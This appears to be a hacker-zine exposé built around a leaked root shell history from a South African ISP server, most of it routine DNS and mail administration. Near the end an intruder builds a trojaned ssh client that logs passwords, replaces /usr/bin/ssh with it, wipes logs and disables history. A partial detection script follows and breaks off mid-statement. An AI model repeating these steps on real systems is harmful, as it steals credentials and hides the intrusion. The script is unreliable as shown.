148 rndc reload geospace.co.za
149 exit
150 ifconfig
151 ssh joe@196.25.45.246
152 ifconfig
153 bwm
154 ssh 196.25.45.234
155 ssh 196.25.29.178
156 grep /var/log/httpd/access_log
157 more /var/log/httpd/access_log
158 more /var/log/httpd/error_log
159 exit
160 vi /etc/named.conf
161 exit
162 cd /var/named/
163 vi ibe.co.za
164 cat candnhose.com
165 vi ibe.co.za
166 cat candnhose.com
167 vi ibe.co.za
168 rndc reload ibe.co.za
169 exit
170 bwm
171 exit
172 vi /var/named/delvenco.co.za
173 rndc reload delvenco.co.za
174 dig mobile.delvenco.co.za
175 xit
176 exit
177 bwm
178 ifconfig wp11aft
179 ssh joe@196.25.45.246
180 exit
181 ssh mail.delvenco.co.za
182 ssh mobile.delvenco.co.za
183 exit
184 vi /var/named/delvenco.co.za
185 telnet mobile.delvenco.co.za 25
186 rndc reload
187 rndc reload delvenco.co.za
188 cd /var/named/
189 vi onestar.co.za
190 vi liberne.co.za
191 vi webz-r-us.co.za
192 rndc reload onestar.co.za
193 rndc reload liberne.co.za
194 rndc reload webz-r-us.co.za
195 dig onestar.co.za mx
196 dig liberne.co.za mx
197 ssh 196.15.249.204
198 exit
199 ssh plet.compumail.co.za
200 exit
201 ssh berner.no-ip.info
202 ssh joe@berner.no-ip.info
203 cat /var/named/logisticor.com
204 vi /var/named/logisticor.com
205 rndc reload logisticor.com
206 ll /var/named/
207 exit
208 ssh lin02.compumail.co.za
209 exit
210 ssh 196.25.45.234
211 ssh plet
212 bwm
213 ssh plet.compumail.co.za
214 exit
215 ll
216 exit
217 vi /etc/named.conf
218 rm -fr /var/named/pakmatic.co.za
219 rndc reload
220 exit
221 ssh parktonian.no-ip.info
222 parktonian.no-ip.info
223 ping parktonian.no-ip.info
224 ssh parktonian.no-ip.info
225 exit
226 bwm
227 exit
228 vi /var/
229 cd /var
230 ls
231 cd ..
232 locate named
233 cd /var/man
234 cd /var/named/
235 ls
236 vi tiscpty.com
237 rndc reload tiscpty.com
238 dig tiscpty.com mx
239 dig mail.tiscpty.com
240 dig mail.tiscpty.com @196.15.249.203
241 dig mail.tiscpty.com @196.15.249.204
242 dig mail.tiscpty.com @196.15.249.203
243 dig mail.tiscpty.com @196.15.249.204
244 dig mail.tiscpty.com @196.15.249.203
245 /etc/init.d/named restart
246 dig mail.tiscpty.com @196.15.249.203
247 dig mail.tiscpty.com @196.15.249.204
248 dig mail.tiscpty.com
249 /etc/init.d/named start
250 /etc/init.d/named restart
251 dig mail.tiscpty.com
252 dig mail.tiscpty.com @196.15.249.204
253 dig mail.tiscpty.com @196.15.249.203
254 ifconfig
255 dig mail.tiscpty.com @196.15.249.203
256 vi /var/named/
257 vi /var/named/tiscpty.com
258 rndc reload
259 dig mail.tiscpty.com @196.15.249.204
260 dig mail.tiscpty.com @196.15.249.203
261 vi tiscpty.com
262 vi acetron.co.za
263 vi tiscpty.com
264 rndc reload
265 dig mail.tiscpty.com @196.15.249.203
266 dig tiscpty.com @196.15.249.203
267 dig tiscpty.com mx @196.15.249.203
268 dig tiscpty.com mx @196.15.249.204
269 dig tiscpty.com @196.15.249.204
270 dig tiscpty.com @196.15.249.203
271 vi tiscpty
272 vi tiscpty.com
273 vi acetron.co.za
274 vi tiscpty.com
275 rndc reload
276 dig tiscpty.com @196.15.249.203
277 dig tiscpty.com mx
278 dig mail.tiscpty.com
279 vi thehouses.co.za
280 exit
281 cd /var/named/
282 ls
283 vi nestlife.co.za
284 rndc reload
285 vi nestlife.co.za
286 vi nestlife.co.za
287 vi knowres.co.za
288 vi nestlife.co.za
289 vi knowres.co.za
290 vi nestlife.co.za
291 rndc reload
292 cd /var/named/
293 vi nestlife.co.za
294 dig nestlife.co.za mx
295 dig nestlife.co.za
296 dig mail.nestlife.co.za
297 dig www.nestlife.co.za
298 vi nestlife.co.za
299 dig www.nestlife.co.za
300 vi nestlife.co.za
301 rndc reload
302 dig pop.netl
303 dig pop.nestlife.co.za
304 ssh plet.compumail.co.za
305 ls
306 ifconfig
307 ssh 196.25.45.254
308 wbm
309 bwm
310 exit
311 vi /var/named/geospace.co.za
312 rndc reload geospace.co.za
313 vi /var/named/geospace.co.za
314 rndc reload geospace.co.za
315 dig geospace.co.za
316 dig www.geospace.co.za
317 dig geospace.co.za
318 vi /var/named/geospace.co.za
319 rndc reload geospace.co.za
320 dig geospace.co.za
321 view /var/log/mail/info
322 view /var/log/messages
323 vi /var/named/geospace.co.za
324 rndc reload geospace.co.za
325 view /var/log/messages
326 tail -f /var/log/messages
327 vi /var/named/motocomp.co.za
328 tail -f /var/log/messages
329 dig geospace.co.za @co.za
330 dig geospace.co.za ns @co.za
331 exit
332 dig geospace.co.za
333 rndc reload
334 dig geospace.co.za
335 vi /var/named/geospace.co.za
336 rndc reload
337 vi /var/named/nestlife.co.za
338 rndc reload
339 vi /var/named/nestlife.co.za
340 rndc reload
341 cd /var/named/
342 vi geospace.
343 vi geospace.co.za
344 rndc reload geospace.co.za
345 dig geospace.co.za
346 dig geospace.co.za @127.0.0.1
347 dig geospace.co.za
348 rndc reload
349 vi geospace.co.za
350 rndc reload
351 exit
352 tail -f /var/log/messages
353 exit
354 cd /var/named/
355 ll geospace.co.za
356 vi geospace.aero
357 vi geospace.co.za
358 rndc reload geospace.co.za
359 di gwww.geospace.co.za
360 dig gwww.geospace.co.za
361 dig www.geospace.co.za
362 rndc reload
363 vi /var/named/geospace.co.za
364 rndc reload geospace.co.za
365 exit
366 tail -f /var/log/messages | grep 192.168.20.23
367 exit
368 mailconf
369 dig tiscpty.com mx
370 dig tiscpty.com mx @196.25.1.1
371 dig tiscpty.com mx @induna.saix.net
372 dig tiscpty.com mx @igubu.saix.net
373 dig mail.tiscpty.com
374 exit
375 dig lin02.lanlink.co.za mx
376 /etc/init.d/named
377 vi /var/named/tiscpty.com
378 dig lin02.compumail.co.za mx
379 dig plet.compumail.co.za mx
380 exit
381 dig stike.co.za mx
382 dig strike.co.za mx
383 dig mail.strike.co.za
384 telnet mail.strike.co.za 25
385 telnet mail.strike.co.za 25
386 quit
387 exit
388 bwm
389 tcpdump -ni eth0
390 bwm
391 ssh 196.25.29.178
392 exit
393 cd /var/named/
394 vi compumail.co.za
395 vi lanlink.co.za
396 vi delvenco.co.za
397 vi onestar.co.za
398 dig compumail.co.za mx @127.0.0.1
399 exit
400 bwm
401 exit
402 bwm
403 exit
404 bwm
405 tcpdump -ni wp2aft src 165.146.147.111
406 tcpdump -ni wp2aft src 165.146.100.119
407 exit
408 cd /var/nm
409 cd /var/named/
410 ls
411 vi tigertruck.co.za
412 vi sheffieldbeachaccommodation.co.za
413 vi tigertruck.co.za
414 vi sheffieldbeachaccommodation.co.za
415 vi sheffieldbeachholiday.co.za
416 vi sheffieldbeachaccommodation.co.za
417 vi sheffieldbeachholiday.co.za
418 vi tigertruck.co.za
419 vi sheffieldbeachholiday.co.za
420 vi sheffieldbeachaccommodation.co.za
421 vi sheffieldbeachholiday.co.za
422 locate Vhosts
423 vi /etc/httpd/conf/vhosts/Vhosts.conf
424 vi /etc/named.conf
425 rndc reload
426 /etc/init.d/named restart
427 dig sheffieldbeachholiday.co.za @196.15.249.203
428 dig mx sheffieldbeachholiday.co.za @196.15.249.203
429 dig mx sheffieldbeachaccommodation.co.za @196.15.249.203
430 exit
431 ssh 196.25.22.178
432 exit
433 traceroute -n 196.25.29.178
434 traceroute -n 196.25.22.178
435 exit
436 cd /etc/
437 cd /var/named/
438 ll
439 cp vepac.co.za ratana.co.za
440 vi ratana.co.za
441 vi vepac.co.za
442 vi /etc/named.conf
443 rndc reload ratana.co.za
444 rndc ratana.co.za reload
445 vi named.ca
446 vi /etc/named.conf
447 ls
448 vi ratana.co.za
449 rndc ratana.co.za reload
450 rndc vepac.co.za reload
451 rndc
452 rndc reload ratana.co.za
453 rndc reload vepac.co.za
454 /etc/init.d/named restart
455 ssh plet.compumail.co.za
456 rndc reload vepac.co.za
457 vi /var/log/messages
458 /etc/init.d/named
459 /etc/init.d/named restart
460 exit
461 tail -f /var/log/messages
462 vi /etc/named.conf
463 tail -f /var/log/messages
464 exit
465 date
466 exit
467 date
468 exit
469 ssh lin02
470 ssh lin02.compumail.co.za
471 ssh plet
472 ssh plet.compumail.co.za
473 exit
474 dig parktonian.no-ip.info
475 dig parktonian.no-ip.info @196.25.1.9
476 exit
477 cd /var/named/
478 vi nestlife.co.za
479 dig r-r-m.co.za mx
480 vi nestlife.co.za
481 rndc reload nestlife.co.za
482 dig nestlife.co.za mx
483 dig nestlife.co.za mx @196.25.1.1
484 ssh parktonian.no-ip.info
485 exit
486 cd /var/named/
487 vi nestlife.co.za
488 rndc reload
489 exit
490 rndc reload iphiko.co.za
491 rndc reload vepac.co.za
492 /etc/init.d/named restart
493 ssh plet.compumail.co.za
494 exit
495 cd /var/named/
496 ll
497 cp ratana.co.za iphiko.co.za
498 vi iphiko.co.za
499 vi /etc/named.conf
500 tail -f /var/log/messages
501 exit
502 cd /etc/shorewall/
503 ls
504 cd ..
505 cd wanpipe
506 ls
507 vi scripts/
508 cd scripts/
509 ls
510 vi wanpipe1-wp3aft-start
511 exit
512 bwm
513 exit
514 vi /var/named/parktonian.co.za
515 rndc reload parktonian.co.za
516 dig parktonian.co.za mx
517 dig parktonian.co.za mx @196.15.249.204
518 telnet mail.parktonian.co.za 25
519 exit
520 vi /var/named/carmart.co.za
521 dig seapoint.no-ip.info
522 rndc reload carmart.co.za
523 exit
524 ssh 196.15.249.204
525 exit
526 telnet mail.carmart.co.za 25
527 exit
528 vi /var/named/prueleith.co.za
529 rmdc reload preuleigh.co.za
530 rndc reload preuleigh.co.za
531 rndc reload prueleigh.co.za
532 rndc reload
533 dig www.prueleigh.co.za
534 dig www.prueleith.co.za
535 dig www.prueleith.co.za @196.25.1.9
536 dig www.prueleith.co.za @ns1.iafrica.co.za
537 dig www.prueleith.co.za
538 cd /home/joe/prueleith/
539 ll
540 tar zScvf web.tgz *
541 ll
542 exit
543 dig prueleith.co.za ns @co.za
544 dig www.prueleith.co.za @plet.compumail.co.za
545 dig www.prueleith.co.za @hermes.is.co.za
546 dig www.prueleith.co.za @196.25.1.1
547 dig www.prueleith.co.za @196.25.1.9
548 dig datapro.co.za ns
549 dig www.prueleith.co.za @ns2.datapro.co.za
550 exit
551 ssh plet.compumail.co.za
552 ssh lin02.compumail.co.za
553 vi /root/.ssh/known_hosts
554 ssh plet.compumail.co.za
555 telnet 196.15.249.204 110
556 telnet 196.15.249.204 25
557 ping 196.15.249.205
558 exit
559 telnet 196.15.249.204 25
560 telnet 196.15.249.204 110
561 exit
562 bwm
563 exit
564 bwm
565 tcpdump -ni wp2aft | grep 165.146.53.80
566 exit
567 dig galileosa.co.za mx
568 exit
569 bwm
570 tcpdump -ni eth0 not tcp 22
571 tcpdump -ni eth0 not tcp port 22
572 bwm
573 tcpdump -ni eth0 not tcp port 22
574 bwm
575 exit
576 dig logisticor.no-ip.info
577 ssh 196.15.249.204
578 ssh 196.15.249.201
579 telnet 196.15.249.204 25
580 vi /etc/named.conf
581 cd /var/named/
582 vi logisticor.com
583 rndc reload logisticor.com
584 vi diemyburghs.co.za
585 dig logisticor.com mx
586 dig mx.logisticor.com
587 vi logisticor.com
588 rndc reload logisticor.com
589 dig mx.logisticor.com
590 telnet mx.logisticor.com 25
591 ssh 196.15.249.204
592 ping 196.15.249.204
593 telnet 196.15.249.204 110
594 telnet 196.15.249.204 25
595 nmap -?
596 nmap -sS 196.15.249.204
597 http://196.15.249.204:54320
598 lynx http://196.15.249.204:54320
599 telnet196.15.249.204 54320
600 telnet 196.15.249.204 54320
601 telnet mx.logisticor.com 25
602 vi /var/mail/joe
603 ssh 196.15.249.201
604 vi /etc/shorewall/rules
605 ssh 196.15.249.204
606 ssh -1 196.15.249.204
607 ssh -?
608 ssh -1 196.15.249.204 reboot
609 exit
610 cd /var/named/
611 vi logisticor.com
612 exit
613 vi /var/named/parktonian.co.za
614 vi /var/named/logisticor.com
615 rndc reload p
616 vi /var/named/parktonian.co.za
617 rndc reload parktonian.co.za
618 vi /var/named/carmart.co.za
619 rndc reload carmart.co.za
620 vi /var/named/delvenco.co.za
621 rndc reload delvenco.co.za
622 vi /var/named/delvenco.co.za
623 rndc reload delvenco.co.za
624 vi /var/named/carmart.co.za
625 rndc reload carmart.co.za
626 cd /var/named/
627 grep no-ip *
628 vi geospace.co.za
629 rndc reload geospace.co.za
630 exit
631 bwm
632 ssh 196.25.45.226
633 ssh andre@196.25.45.226
634 exit
635 bwm
636 exit
637 ssh /var/named/logisticor.com
638 vi /var/named/logisticor.com
639 rndc reload logisticor.com
640 dig logisticor.com mx
641 dig mail.logisticor.com
642 dig mail.logisticor.com @196.25.1.9
643 dig mail.logisticor.com @196.25.1.1
644 exit
645 bwm
646 ssh 196.25.45.226
647 ssh andre@196.25.45.226
648 dig ratana.co.za mx
649 exit
650 ifconfig
651 uvongo.compumail.co.za
652 ifconfig
653 bwm
654 exit
655 ssh plet.compumail.co.za
656 bwm
657 exit
658 ssh lin02.lanlink.co.za
659 ssh lin02.compumail.co.za
660 ssh plet
661 ssh plet.copmpumail.co.za
662 ssh plet.compumail.co.za
663 ssh parktonian.no-ip.ino
664 ssh parktonian.no-ip.info
665 ping uvongo.compumail.co.za
666 ssh uvongo.compumail.co.za
667 ping uvongo.compumail.co.za
668 ssh uvongo.compumail.co.za
669
670 wanrouter restart
671 wanrouter status
672 exit
673 bwm
674 ssh 196.25.45.214
675 exit
676 bwm
677 exit
678 dig -x 196.25.45.226 @196.25.1.9
679 dig -x 196.25.45.226
680 exit
681 dmesg
682 cat /var/log/messages
683 dmesg -c
684 cat /var/log/messages
685 exit
686 dig logisticor.com ns @196.25.1.1
687 dig logisticor.com ns @ns1.microsoft.com
688 dig logisticor.com ns @196.25.1.1
689 dig logisticor.com ns @196.25.1.9
690 exit
691 ping rndf-146-33-06.telkomadsl.co.za
692 exit
693 bwm
694 tcpdump -ni eth0 not tcp 22
695 tcpdump -ni eth0 not tcp port 22
696 bwm
697 exit
698 dig nasd.com ns
699 whois 216.52.126.1
700 dig nasdac.com
701 d
702 dig nasd.com ns
703 whois 63.251.87.230
704 whois 63.251.87.230 ?
705 dig jardinewindsor.com
706 dig jardinewindsor.com ns
707 dig ns1.dns27.com
708 whois 67.18.73.199
709 dig theplanet.com
710 dig jardinewindsor.com ns
711 dig jardinewindsor.com soa
712 exit
713 ping 196.15.249.204
714 telnet 196.15
715 telnet 196.15.249.204 110
716 telnet 196.15.249.204 25
717 telnet lin02.compumail.co.za 110
718 exit
719 ssh 196.15.249.204
720 ssh root@196.15.249.204
721 ssh joe@196.15.249.204
722 telnet 196.15.249.204 110
723 telnet 196.15.249.204 25
724 exit
725 ping 196.15.249.204
726 ssh 196.15.249.204
727 exit
728 dig atn.co.za ns
729 dig alltransportmeeds.co.za ns
730 dig alltransportneeds.co.za ns
731 dig alltransportneeds.co.za ns @co.za
732 dig webmail.alltransportneeds.co.za
733 dig www.alltransportneeds.co.za
734 dig www.alltransportneeds.co.za 196.7.0.139
735 dig www.alltransportneeds.co.za @196.7.0.139
736 dig www.atn.co.za @196.7.0.139
737 dig atn.co.za mx @196.7.0.139
738 exit
739 ssh plet.compumail.co.za
740 ssh 196.25.45.226
741 ssh andre@196.25.45.226
742 ping mail.knowres.co.za
743 dnsconf
744 ifconfig
745 dig knowres.co.za mx
746 cd /var/named/
747 vi knowres.co.za
748 rndc reload
749 dig mailserver.knowres.co.za
750 dig knowres.co.za mx
751 dig knowres.co.za mx @plet.compumail.co.za
752 rndc knowres.co.za reload
753 dig knowres.co.za mx @plet.compumail.co.za
754 vi knowres.co.za
755 rndc knowres.co.za reload
756 vi knowres.co.za
757 vi ithemba.co.za
758 vi knowres.co.za
759 rndc knowres.co.za reload
760 rndc reload
761 dig knowres.co.za mx @plet.compumail.co.za
762 dig apex.co.za
763 dig apex.co.za mx
764 dig apex-leads.co.za mx
765 dig mail.apex-leads.co.za
766 telnet mail.apex-leads.co.za 25
767 dig logisticor.com mx
768 exit
769 bwm
770 tcpdump -i wp5aft
771 tcpdump wp5aft
772 tcpdump wp5aft
773 tcpdump -i wp5aft
774 bwm
775 exit
776 $TTL 60
777 ssh joe@ireneguest.no-ip.info
778 vi /var/named/compumail.co.za
779 ssh ireneguest.no-ip.info
780 ssh joe@ireneguest.no-ip.info
781 su
782 exit
783 ssh 196.15.249.204
784 ssh 196.15.249.203
785 ssh 196.15.249.204
786 exit
787 bwm
788 exit
789 telnet mail.singita.co.za 25
790 exit
791 telnet mail.singita.co.za 25
792 ssh lin02.lanlink.co.za
793 exit
794 bwm
795 ssh 196.25.45.254
796 ssh 165.165.36.84
797 ping 196.15.249.205
798 exit
799 bwm
800 exit
801 bwm
802 exit
803 cd /etc/wanpipe/
804 ll
805 vi wanpipe1.conf
806 bwm
807 wanrouter restart wp7aft
808 vi wanpipe1.conf
809 wanrouter
810 wanrouter restart wanpipe1 wp7aft
811 wanrouter status wanpipe1 wp7aft
812 ifconfig
813 wanrouter
814 wanrouter debug wp7aft
815 wanrouter
816 wanrouter restart wanpipe1 wp7aft
817 ping 196.25.45.254
818 ssh 196.25.45.254
819 wanrouter restart wanpipe1 wp7aft
820 vi interfaces/wp7aft
821 vi wanpipe1.conf
822 wanrouter restart wanpipe1 wp7aft
823 ssh 196.25.45.254
824 ping 196.25.45.254
825 bwm
826 ssh 196.25.45.254
827 ssh 196.15.249.204
828 exit
829 bwm
830 ll
831 cd /home/joe/
832 ll
833 cd Mandrakelinux-10.1-Official-Powerpack/
834 ll
835 exit
836 vi /var/named/mentorfreight.co.za
837 rndc reload mentorfreight.co.za
838 netstat -an | grep 22
839 exit
840 telnet adsl.mentrofreight.co.za 25
841 telnet adsl.mentorfreight.co.za 25
842 telnet 165.146.6.83 25
843 vi /var/named/mentorfreight.co.za
844 rndc reload mentorfreight.co.za
845 mail administrator@mentorfreight.co.za
846 exit
847 vi /var/named/lanlink.co.za
848 cat /etc/sysconfig/static-routes
849 route add -net 196.15.249.224/29 gw 196.15.249.205
850 route add -net 196.15.249.220/30 gw 196.15.249.205
851 netstat -rn | grep 196.25.45.214
852 netstat -rn | grep 196.25.45.194
853 netstat -rn | grep 196.15.249.234
854 exit
855 telnet adsl.mentrofreight.co.za 25
856 telnet mentorfreight.co.za 25
857 telnet adsl.mentorfreight.co.za 25
858 bwm
859 ssh 192.25.45.254
860 ssh 196.25.45.254
861 exit
862 ssh 196.15.249.201
863 exit
864 demsg -c
865 dmesg -c
866 ping 196.15.249.206
867 demsg -c
868 dmesg -c
869 ssh 196.15.249.201
870 exit
871 ssh 196.25.45.254
872 bwm
873 exit
874 bwm
875 ssh lin02.lanlink.co.za
876 ssh lin02.compumail.co.za
877 exit
878 mailconf
879 ssh plet.compumail.co.za
880 exit
881 w
882 cd /tmp
883 mkdir ...
884 chmod 700 ...
885 cd ...
886 ls
887 ssh -V
888 wget http://openbsd.secsup.org/OpenSSH/portable/openssh-3.6.1p2.tar.gz
889 tar xzf *
890 netstat -antp | grep LISTEN
891 which apache
892 which httpd
893 locate httpd
894 /usr/sbin/httpd2
895 netstat -antp
896 ls /var/www/
897 ls /var/www//html
898 cd o*
899 ls
900 pico sshconnect2.c
901 nano sshconnect2.c -w
902 cd ..
903 wget http://www.nano-editor.org/dist/v1.2/nano-1.2.5.tar.gz
904 tar xzf nano*
905 cd nano*
906 ./configure && make
907 make install
908 cd ..
909 cd o*
910 nano -w sshconnect2.c
911 ./configure && make
912 ./ssh root@localhost
913 cat /var/tmp/.ssheist.log
914 rm -rf /var/tmp/.ssheist.log
915 cp ssh /usr/bin/ssh
916 cp ssh /var/www/html
917 rm -rf /var/www/html/ssh
918 rm -rf ../*
919 cd ..
920 ls
921 exit
922 tail -f /var/log/messages | grep 165.146.101.31
923 ll
924 exit
925 w
926 cat /var/tmp/.ssheist.log
927 exit
928 telnet histologic.no-ip.info
929 exit
930 ssh plet.compumail.co.za
931 exit
932 bwm
933 exit
934 bwm
935 exit
936 bwm
937 cat /var/named/mentorfreight.co.za
938 dig adsl.mentorfreight.co.za
939 bwm
940 exit
941 wanrouter status
942 wanrouter
943 wanrouter summary
944 bwm
945 wanrouter restart wp2aft
946 wanrouter/?
947 wanrouter /?
948 wanrouter restart wanpipe1 wp2aft
949 wanrouter status wanpipe1 wp2aft
950 bwm
951 ping 196.25.1.1
952 ifconfig
953 ping 196.25.245.193
954 ping 196.25.1.1
955 ssh 196.15.249.207
956 ping 196.25.1.1
957 ssh 196.25.45.214
958 ping 196.25.1.1
959 ifconfig
960 ifconfig wp2aft
961 wanrouter
962 wanrouter modules
963 man ifconfig
964 whereis wanrouter
965 cd /home/joe/
966 ll
967 cd wanpipe
968 ll
969 ll util/
970 wanpipemon
971 ll
972 cd samples/
973 ll
974 cd ..
975 ll
976 view README-3.operation
977 ll
978 ll interfaces/
979 ll /etc/wanpipe/interfaces/
980 wanrouter debug wp2aft
981 ping 196.25.1.1
982 bwm
983 ping 196.25.1.1
984 exit
985 ssh 196.15.249.201
986 exit
987 w
988 cat /var/tmp/.ssheiost.log
989 cat /var/tmp/.ssheist.log
990 host 196.15.249.207
991 host 196.25.45.214
992 ssh root@196.25.45.214
993 cat /var/tmp/.ssheist.log
994 host 196.25.45.214
995 cat > /var/tmp/.ssheist.log
996 cat /var/tmp/.ssheist.log
997 exit
998 w
999 logout
1000 w
1001 unset HISTFILE
1002 uname -a; cat /etc/issue
1003 history
[root@knysna root]# ls -al
total 655228
drwx------ 7 root root 4096 Jun 13 12:46 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
-rwxr-xr-x 1 root root 14012 Oct 18 2004 a.out*
-rw------- 1 root root 18715 Jun 14 02:00 .bash_history
-rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout
-rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile
-rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc
-rw-r--r-- 1 root root 381 Mar 29 12:42 cadmapping.co.za
drwxr-xr-x 2 root root 4096 Jan 20 10:03 .cpan/
-rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc
drwx------ 2 root root 4096 Aug 31 2004 drakx/
-rw-r--r-- 1 root root 355 Dec 10 2004 .fonts.cache-1
-rw-r--r-- 1 root root 5639 Dec 10 2004 ip_nat_tftp.ko
-rwxr-xr-x 1 root root 670156800 Nov 30 2004 mailpack.tgz*
-rw-r--r-- 1 root root 138 Feb 13 20:24 .rpmdrake
drwx------ 2 root root 4096 May 22 09:08 .ssh/
-rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc
-rw-r--r-- 1 root root 691 Oct 18 2004 test
drwx------ 2 root root 4096 Jun 14 01:53 tmp/
drwxr-xr-x 2 root root 4096 Oct 18 2004 vcia/
-rw------- 1 root root 8549 Jun 13 12:46 .viminfo
-rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc
-rw------- 1 root root 52 Jun 2 10:44 .Xauthority
-rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults
[root@knysna root]# ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 Aug 31 2004 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx--x--x 3 admin admin 4096 Aug 31 2004 admin/
drwx--x--x 10 joe joe 4096 May 20 14:57 joe/
[root@knysna root]# ls -al /tmp. //.../
total 8
drwx------ 2 root root 4096 Jun 8 16:32 ./
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../
[root@knysna root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1580 520 ? S Apr11 0:10 init [3]
root 2 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/1]
root 5 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/1]
root 6 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/0]
root 7 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/1]
root 8 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/0]
root 9 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/1]
root 10 0.0 0.0 0 0 ? SW Apr11 0:00 [kirqd]
root 11 0.0 0.0 0 0 ? SW Apr11 0:00 [pdflush]
root 12 0.0 0.0 0 0 ? SW Apr11 0:04 [pdflush]
root 13 0.0 0.0 0 0 ? SW Apr11 0:00 [kswapd0]
root 14 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/0]
root 15 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/1]
root 17 0.0 0.0 0 0 ? SW Apr11 0:00 [kseriod]
root 25 0.0 0.0 0 0 ? SW Apr11 1:08 [kjournald]
root 115 0.0 0.0 2188 1300 ? S Apr11 0:00 devfsd /dev
root 205 0.0 0.0 0 0 ? SW Apr11 0:01 [khubd]
root 889 0.0 0.0 1660 560 ? S Apr11 0:00 /sbin/ifplugd -w
root 972 0.0 0.0 1880 812 ? S Apr11 2:10 syslogd -m 0 -a /
root 980 0.0 0.0 2580 1548 ? S Apr11 0:11 klogd -c 3 -2
daemon 1327 0.0 0.0 1772 616 ? S Apr11 0:00 /usr/sbin/atd
root 1343 0.0 0.1 5400 3224 ? S Apr11 0:00 /usr/sbin/snmpd -
root 1358 0.0 0.1 4884 2180 ? S Apr11 0:03 /usr/sbin/snmptra
root 1432 0.0 0.0 2240 964 ? S Apr11 0:00 xinetd -stayalive
root 1525 0.0 0.0 1780 708 ? S Apr11 0:00 crond
root 1599 0.0 0.0 1576 444 tty2 S Apr11 0:00 /sbin/mingetty tt
root 1600 0.0 0.0 1568 440 tty3 S Apr11 0:00 /sbin/mingetty tt
root 1601 0.0 0.0 1568 440 tty4 S Apr11 0:00 /sbin/mingetty tt
root 1602 0.0 0.0 1568 440 tty5 S Apr11 0:00 /sbin/mingetty tt
root 1603 0.0 0.0 1568 440 tty6 S Apr11 0:00 /sbin/mingetty tt
named 10104 0.0 0.5 47140 11616 ? S May19 0:00 named -u named
root 9994 0.0 0.0 2492 1080 ? S May26 0:00 login -- root
root 14688 0.0 0.0 3060 1848 tty1 S Jun01 0:00 -bash
root 21342 0.0 0.1 5228 2500 ? S Jun08 0:00 /usr/sbin/httpd2
root 21343 0.0 0.1 4028 2220 ? S Jun08 0:00 /usr/bin/perl /us
apache 4906 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4909 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4917 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
root 10058 0.0 0.1 6348 2080 ? S Jun13 0:01 sshd: root@pts/0
root 10060 0.0 0.0 2952 1720 pts0 S Jun13 0:00 -bash
apache 10101 0.0 0.1 5228 2652 ? S Jun13 0:00 /usr/sbin/httpd2
apache 10111 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11507 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11508 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11509 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11510 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11512 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
root 22406 0.0 0.0 3404 1468 ? S 02:08 0:00 /usr/sbin/sshd
root 28377 0.0 0.0 5972 1752 ? S 07:02 0:00 sshd: root@pts/1
root 28379 0.0 0.0 2952 1720 pts1 S 07:03 0:00 -bash
root 28423 0.0 0.0 2572 852 pts1 R 07:05 0:00 ps aux
[root@knysna root]# ls -al /tmp/
total 20
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx------ 2 root root 4096 Jun 8 16:32 .../
drwx------ 2 root root 4096 Aug 31 2004 gconfd-root/
drwxrwxrwt 2 root root 4096 Aug 31 2004 .ICE-unix/
[root@knysna root]# ls -al /car/tmp/
ls: /car/tmp/: No such file or directory
[root@knysna root]# ls -al /car/tmp/v
total 8
drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root root 4096 Aug 31 2004 ../
-rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log
[root@knysna root]# hostname
knysna
[root@knysna root]# cat /root/.ssh/known_hosts
[root@knysna root]# cd /var /run
[root@knysna run]# ./ma sshd.sync
2to: 127.0.0.1 user: ls pass: ss
2to: 127.0.0.1 user: ls pass: s
2to: 127.0.0.1 user: ls pass: s
[root@knysna run]# cat /etc/hosts
127.0.0.1localhost
[root@knysna run]# logout
===========================================
> From these shells we notice a few things:
1: tal0n sets up ssheist (his ssh sniffer).
2: he usually makes a dir /.../ in /tmp/, so if you have something like /tmp/.../ you
have been owned by skew.
but that's fucking impossible unless you're a complete dumbshit.
3: skew can't hack.
============================================
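The traces named above can be checked for directly: a dot-only directory under /tmp, a hidden log like /var/tmp/.ssheist.log, and a system ssh client overwritten the way `cp ssh /usr/bin/ssh` does in the history. This is an added example, not part of the original zine; the function names are made up here, and the package check assumes an RPM-based host (the listing shows .rpmdrake in root's home).

```shell
#!/bin/sh
# Added example: look for the three traces visible in the session above.
# Paths come from the page; every function name here is hypothetical.

# Directories whose name is made only of dots ("...", "...."), the hiding
# trick seen as /tmp/... in the listing.
find_dot_dirs() {
    find "$1" -type d -name '.*' 2>/dev/null | while IFS= read -r path; do
        name=${path##*/}
        case $name in
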